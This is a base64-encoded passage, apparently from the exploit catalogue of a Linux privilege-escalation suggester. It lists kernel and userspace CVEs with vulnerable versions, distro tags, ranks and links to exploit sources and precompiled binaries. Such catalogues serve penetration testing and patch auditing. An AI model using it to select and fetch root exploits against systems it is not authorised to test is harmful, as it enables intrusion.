pbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8NC41LjUsQ09ORklHX0JQRl9TWVNDQUxMPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC40LjAtMjEtZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYnVncy5jaHJvbWl1bS5vcmcvcC9wcm9qZWN0LXplcm8vaXNzdWVzL2RldGFpbD9pZD04MDgKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0LWRhdGFiYXNlLWJpbi1zcGxvaXRzL3Jhdy9tYXN0ZXIvYmluLXNwbG9pdHMvMzk3NzIuemlwCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKZXhwbG9pdC1kYjogNDA3NTkKYXV0aG9yOiBKYW5uIEhvcm4KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01MTk1XSR7dHh0cnN0fSBkaXJ0eWNvdwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjIyLHZlcjw9NC44LjMKVGFnczogZGViaWFuPTd8OCxSSEVMPTV7a2VybmVsOjIuNi4oMTh8MjR8MzMpLSp9LFJIRUw9NntrZXJuZWw6Mi42LjMyLSp8My4oMHwyfDZ8OHwxMCkuKnwyLjYuMzMuOS1ydDMxfSxSSEVMPTd7a2VybmVsOjMuMTAuMC0qfDQuMi4wLTAuMjEuZWw3fSx1YnVudHU9MTYuMDR8MTQuMDR8MTIuMDQKUmFuazogNAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9kaXJ0eWNvdy9kaXJ0eWNvdy5naXRodWIuaW8vd2lraS9WdWxuZXJhYmlsaXR5RGV0YWlscwpDb21tZW50czogRm9yIFJIRUwvQ2VudE9TIHNlZSBleGFjdCB2dWxuZXJhYmxlIHZlcnNpb25zIGhlcmU6IGh0dHBzOi8vYWNjZXNzLnJlZGhhdC5jb20vc2l0ZXMvZGVmYXVsdC9maWxlcy9yaC1jdmUtMjAxNi01MTk1XzUuc2gKZXhwbG9pdC1kYjogNDA2MTEKYXV0aG9yOiBQaGlsIE9lc3RlcgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTUxOTVdJHt0eHRyc3R9IGRpcnR5Y293IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4yMix2ZXI8PTQuOC4zClRhZ3M6IGRlYmlhbj03fDgsUkhFTD01fDZ8Nyx1YnVudHU9MTQuMDR8MTIuMDQsdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItMjEtZ2VuZXJpY30sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiA0CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL2RpcnR5Y293L2RpcnR5Y293LmdpdGh1Yi5pby93aWtpL1Z1bG5lcmFiaWxpdHlEZXRhaWxzCmV4dC11cmw6IGh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2Rvd25sb2FkLzQwODQ3CkNvbW1lbnRzOiBGb3IgUkhFTC9DZW50T1Mgc2VlIGV4YWN0IHZ1bG5lcmFibGUgdmVyc2lvbnMgaGVyZTogaHR0cHM6Ly9hY2Nlc3MucmVkaGF0LmNvbS9zaXRlcy9kZWZhdWx0L2ZpbGVzL3JoLWN2ZS0yMDE2LTUxOTVfNS5zaApleHBsb2l0LWRiOiA0MDgzOQphdXRob3I6IEZpcmVGYXJ0IChhdXRob3Igb2YgZXhwbG9pdCBhdCBFREIgNDA4MzkpOyBHYWJyaWVsZSBCb25hY2luaSAoYXV0aG9yIG9mIGV4cGxvaXQgYXQgJ2V4dC11cmwnKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTg2NTVdJHt0eHRyc3R9IGNob2NvYm9fcm9vdApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPDQuOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtKDIxfDIyfDI0fDI4fDMxfDM0fDM2fDM4fDQyfDQzfDQ1fDQ3fDUxKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTYvMTIvMDYvMQpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwYWJpbGl0eSBpcyBuZWVkZWQgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkcyB0byBiZSBlbmFibGVkCmJpbi11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yYXBpZDcvbWV0YXNwbG9pdC1mcmFtZXdvcmsvbWFzdGVyL2RhdGEvZXhwbG9pdHMvQ1ZFLTIwMTYtODY1NS9jaG9jb2JvX3Jvb3QKZXhwbG9pdC1kYjogNDA4NzEKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTk3OTNdJHt0eHRyc3R9IFNPX3tTTkR8UkNWfUJVRkZPUkNFClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjExLHZlcjw0LjguMTQsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvdHJlZS9tYXN0ZXIvQ1ZFLTIwMTYtOTc5MwpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi05NzkzL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcHMgT1IgQ09ORklHX1VTRVJfTlM9eSBuZWVkZWQuIE5vIFNNRVAvU01BUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIFRlc3RlZCBpbiBRRU1VIG9ubHkKZXhwbG9pdC1kYjogNDE5OTUKYXV0aG9yOiBBbmRyZXkgJ3hhaXJ5JyBLb25vdmFsb3YKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy02MDc0XSR7dHh0cnN0fSBkY2NwClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPD00LjkuMTEsQ09ORklHX0lQX0RDQ1A9W215XQpUYWdzOiB1YnVudHU9KDE0LjA0fDE2LjA0KXtrZXJuZWw6NC40LjAtNjItZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAyLzIyLzMKQ29tbWVudHM6IFJlcXVpcmVzIEtlcm5lbCBiZSBidWlsdCB3aXRoIENPTkZJR19JUF9EQ0NQIGVuYWJsZWQuIEluY2x1ZGVzIHBhcnRpYWwgU01FUC9TTUFQIGJ5cGFzcwpleHBsb2l0LWRiOiA0MTQ1OAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTczMDhdJHt0eHRyc3R9IGFmX3BhY2tldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMC42LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC44LjAtKDM0fDM2fDM5fDQxfDQyfDQ0fDQ1KS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jb20vMjAxNy8wNS9leHBsb2l0aW5nLWxpbnV4LWtlcm5lbC12aWEtcGFja2V0Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3hhaXJ5L2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTctNzMwOC9wb2MuYwpDb21tZW50czogQ0FQX05FVF9SQVcgY2FwIG9yIENPTkZJR19VU0VSX05TPXkgbmVlZGVkLiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyBhZGRzIHN1cHBvcnQgZm9yIGFkZGl0aW9uYWwga2VybmVscwpiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE3LTczMDgvZXhwbG9pdApleHBsb2l0LWRiOiA0MTk5NAphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTY5OTVdJHt0eHRyc3R9IGVCUEZfdmVyaWZpZXIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuOCxDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogZGViaWFuPTkuMHtrZXJuZWw6NC45LjAtMy1hbWQ2NH0sZmVkb3JhPTI1fDI2fDI3LHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtODktZ2VuZXJpY30sdWJ1bnR1PSgxNi4wNHwxNy4wNCl7a2VybmVsOjQuKDh8MTApLjAtKDE5fDI4fDQ1KS1nZW5lcmljfQpSYW5rOiA1CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9yaWNrbGFyYWJlZS5ibG9nc3BvdC5jb20vMjAxOC8wNy9lYnBmLWFuZC1hbmFseXNpcy1vZi1nZXQtcmVrdC1saW51eC5odG1sCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0NBTEwgbmVlZHMgdG8gYmUgc2V0ICYmIGtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkICE9IDEKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xNjk5NS9leHBsb2l0Lm91dApleHBsb2l0LWRiOiA0NTAxMAphdXRob3I6IFJpY2sgTGFyYWJlZQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTEwMDAxMTJdJHt0eHRyc3R9IE5FVElGX0ZfVUZPClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjQsdmVyPD00LjEzLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0xNC4wNHtrZXJuZWw6NC40LjAtKn0sdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTcvMDgvMTMvMQpzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy0xMDAwMTEyL3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX0FETUlOIGNhcCBvciBDT05GSUdfVVNFUl9OUz15IG5lZWRlZC4gU01FUC9LQVNMUiBieXBhc3MgaW5jbHVkZWQuIE1vZGlmaWVkIHZlcnNpb24gYXQgJ2V4dC11cmwnIGFkZHMgc3VwcG9ydCBmb3IgYWRkaXRpb25hbCBkaXN0cm9zL2tlcm5lbHMKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9jdmUtMjAxNy0xMDAwMTEyL2V4cGxvaXQub3V0CmV4cGxvaXQtZGI6CmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92IChvcmdpbmFsIGV4cGxvaXQgYXV0aG9yKTsgQnJlbmRhbiBDb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMjUzXSR7dHh0cnN0fSBQSUVfc3RhY2tfY29ycnVwdGlvbgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9NC4xMyx4ODZfNjQKVGFnczogUkhFTD02LFJIRUw9N3trZXJuZWw6My4xMC4wLTUxNC4yMS4yfDMuMTAuMC01MTQuMjYuMX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wOS8yNi9saW51eC1waWUtY3ZlLTIwMTctMTAwMDI1My9jdmUtMjAxNy0xMDAwMjUzLnR4dApzcmMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDkvMjYvbGludXgtcGllLWN2ZS0yMDE3LTEwMDAyNTMvY3ZlLTIwMTctMTAwMDI1My5jCmV4cGxvaXQtZGI6IDQyODg3CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE4LTUzMzNdJHt0eHRyc3R9IHJkc19hdG9taWNfZnJlZV9vcCBOVUxMIHBvaW50ZXIgZGVyZWZlcmVuY2UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTQuMTMsY21kOmdyZXAgLXFpIHJkcyAvcHJvYy9tb2R1bGVzLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuNC4wfDQuOC4wfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vd2Jvd2xpbmcvOWQzMjQ5MmJkOTZkOWU3YzNiZjUyZTIzYTBhYzMwYTQvcmF3Lzk1OTMyNTgxOWM3ODI0OGE2NDM3MTAyYmIyODliYjg1NzhhMTM1Y2QvY3ZlLTIwMTgtNTMzMy1wb2MuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTgtNTMzMy9jdmUtMjAxOC01MzMzLmMKQ29tbWVudHM6IHJkcy5rbyBrZXJuZWwgbW9kdWxlIG5lZWRzIHRvIGJlIGxvYWRlZC4gTW9kaWZpZWQgdmVyc2lvbiBhdCAnZXh0LXVybCcgYWRkcyBzdXBwb3J0IGZvciBhZGRpdGlvbmFsIHRhcmdldHMgYW5kIGJ5cGFzc2luZyBLQVNMUi4KYXV0aG9yOiB3Ym93bGluZyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xODk1NV0ke3R4dHJzdH0gc3VidWlkX3NoZWxsClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjE1LHZlcjw9NC4xOS4yLENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLGNtZDpbIC11IC91c3IvYmluL25ld3VpZG1hcCBdLGNtZDpbIC11IC91c3IvYmluL25ld2dpZG1hcCBdClRhZ3M6IHVidW50dT0xOC4wNHtrZXJuZWw6NC4xNS4wLTIwLWdlbmVyaWN9LGZlZG9yYT0yOHtrZXJuZWw6NC4xNi4zLTMwMS5mYzI4fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE3MTIKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NTg4Ni56aXAKZXhwbG9pdC1kYjogNDU4ODYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xMzI3Ml0ke3R4dHJzdH0gUFRSQUNFX1RSQUNFTUUKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQsdmVyPDUuMS4xNyxzeXNjdGw6a2VybmVsLnlhbWEucHRyYWNlX3Njb3BlPT0wLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuMTUuMC0qfSx1YnVudHU9MTguMDR7a2VybmVsOjQuMTUuMC0qfSxkZWJpYW49OXtrZXJuZWw6NC45LjAtKn0sZGViaWFuPTEwe2tlcm5lbDo0LjE5LjAtKn0sZmVkb3JhPTMwe2tlcm5lbDo1LjAuOS0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE5MDMKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0ZGItYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80NzEzMy56aXAKZXh0LXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEzMjcyL3BvYy5jCkNvbW1lbnRzOiBSZXF1aXJlcyBhbiBhY3RpdmUgUG9sS2l0IGFnZW50LgpleHBsb2l0LWRiOiA0NzEzMwpleHBsb2l0LWRiOiA0NzE2MwphdXRob3I6IEphbm4gSG9ybiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xNTY2Nl0ke3R4dHJzdH0gWEZSTV9VQUYKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMsdmVyPDUuMC4xOSxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MSxDT05GSUdfWEZSTT15ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2R1YXN5bnQuY29tL2Jsb2cvdWJ1bnR1LWNlbnRvcy1yZWRoYXQtcHJpdmVzYwpiaW4tdXJsOiBodHRwczovL2dpdGh1Yi5jb20vZHVhc3ludC94ZnJtX3BvYy9yYXcvbWFzdGVyL2x1Y2t5MApDb21tZW50czogQ09ORklHX1VTRVJfTlMgbmVlZHMgdG8gYmUgZW5hYmxlZDsgQ09ORklHX1hGUk0gbmVlZHMgdG8gYmUgZW5hYmxlZAphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtMjczNjVdJHt0eHRyc3R9IGxpbnV4LWlzY3NpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD01LjExLjMsQ09ORklHX1NMQUJfRlJFRUxJU1RfSEFSREVORUQhPXkKVGFnczogUkhFTD04ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cuZ3JpbW0tY28uY29tLzIwMjEvMDMvbmV3LW9sZC1idWdzLWluLWxpbnV4LWtlcm5lbC5odG1sCnNyYy11cmw6IGh0dHBzOi8vY29kZWxvYWQuZ2l0aHViLmNvbS9ncmltbS1jby9Ob3RRdWl0ZTBEYXlGcmlkYXkvemlwL3RydW5rCkNvbW1lbnRzOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRCBtdXN0IG5vdCBiZSBlbmFibGVkCmF1dGhvcjogR1JJTU0KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0zNDkwXSR7dHh0cnN0fSBlQlBGIEFMVTMyIGJvdW5kcyB0cmFja2luZyBmb3IgYml0d2lzZSBvcHMKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTUuNyx2ZXI8NS4xMixDT05GSUdfQlBGX1NZU0NBTEw9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQhPTEKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0oMjV8MjZ8Mjd8Mjh8Mjl8MzB8MzF8MzJ8MzN8MzR8MzV8MzZ8Mzd8Mzh8Mzl8NDB8NDF8NDJ8NDN8NDR8NDV8NDZ8NDd8NDh8NDl8NTB8NTF8NTIpLSp9LHVidW50dT0yMS4wNHtrZXJuZWw6NS4xMS4wLTE2LSp9ClJhbms6IDUKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5ncmFwbHNlY3VyaXR5LmNvbS9wb3N0L2tlcm5lbC1wd25pbmctd2l0aC1lYnBmLWEtbG92ZS1zdG9yeQpzcmMtdXJsOiBodHRwczovL2NvZGVsb2FkLmdpdGh1Yi5jb20vY2hvbXBpZTEzMzcvTGludXhfTFBFX2VCUEZfQ1ZFLTIwMjEtMzQ5MC96aXAvbWFpbgpDb21tZW50czogQ09ORklHX0JQRl9TWVNDQUxMIG5lZWRzIHRvIGJlIHNldCAmJiBrZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCAhPSAxCmF1dGhvcjogY2hvbXBpZTEzMzcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMS0yMjU1NV0ke3R4dHJzdH0gTmV0ZmlsdGVyIGhlYXAgb3V0LW9mLWJvdW5kcyB3cml0ZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE5LHZlcjw9NS4xMi1yYzYKVGFnczogdWJ1bnR1PTIwLjA0e2tlcm5lbDo1LjguMC0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9nb29nbGUuZ2l0aHViLmlvL3NlY3VyaXR5LXJlc2VhcmNoL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvd3JpdGV1cC5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9nb29nbGUvc2VjdXJpdHktcmVzZWFyY2gvbWFzdGVyL3BvY3MvbGludXgvY3ZlLTIwMjEtMjI1NTUvZXhwbG9pdC5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAyMS0yMjU1NS9leHBsb2l0LmMKQ29tbWVudHM6IGlwX3RhYmxlcyBrZXJuZWwgbW9kdWxlIG11c3QgYmUgbG9hZGVkCmV4cGxvaXQtZGI6IDUwMTM1CmF1dGhvcjogdGhlZmxvdyAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IGJjb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCiMjIyMjIyMjIyMjIyBVU0VSU1BBQ0UgRVhQTE9JVFMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0wMTg2XSR7dHh0cnN0fSBzYW1iYQpSZXFzOiBwa2c9c2FtYmEsdmVyPD0yLjIuOApUYWdzOiAKUmFuazogMQpleHBsb2l0LWRiOiAyMzY3NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0xMTg1XSR7dHh0cnN0fSB1ZGV2ClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEsY21kOltbIC1mIC9ldGMvdWRldi9ydWxlcy5kLzk1LXVkZXYtbGF0ZS5ydWxlcyB8fCAtZiAvbGliL3VkZXYvcnVsZXMuZC85NS11ZGV2LWxhdGUucnVsZXMgXV0KVGFnczogdWJ1bnR1PTguMTB8OS4wNApSYW5rOiAxCmV4cGxvaXQtZGI6IDg1NzIKQ29tbWVudHM6IFZlcnNpb248MS40LjEgdnVsbmVyYWJsZSBidXQgZGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZCAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMTE4NV0ke3R4dHJzdH0gdWRldiAyClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA4NDc4CkNvbW1lbnRzOiBTU0ggYWNjZXNzIHRvIG5vbiBwcml2aWxlZ2VkIHVzZXIgaXMgbmVlZGVkLiBWZXJzaW9uPDEuNC4xIHZ1bG5lcmFibGUgYnV0IGRpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMDgzMl0ke3R4dHJzdH0gUEFNIE1PVEQKUmVxczogcGtnPWxpYnBhbS1tb2R1bGVzLHZlcjw9MS4xLjEKVGFnczogdWJ1bnR1PTkuMTB8MTAuMDQKUmFuazogMQpleHBsb2l0LWRiOiAxNDMzOQpDb21tZW50czogU1NIIGFjY2VzcyB0byBub24gcHJpdmlsZWdlZCB1c2VyIGlzIG5lZWRlZApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MTcwXSR7dHh0cnN0fSBTeXN0ZW1UYXAKUmVxczogcGtnPXN5c3RlbXRhcCx2ZXI8PTEuMwpUYWdzOiBSSEVMP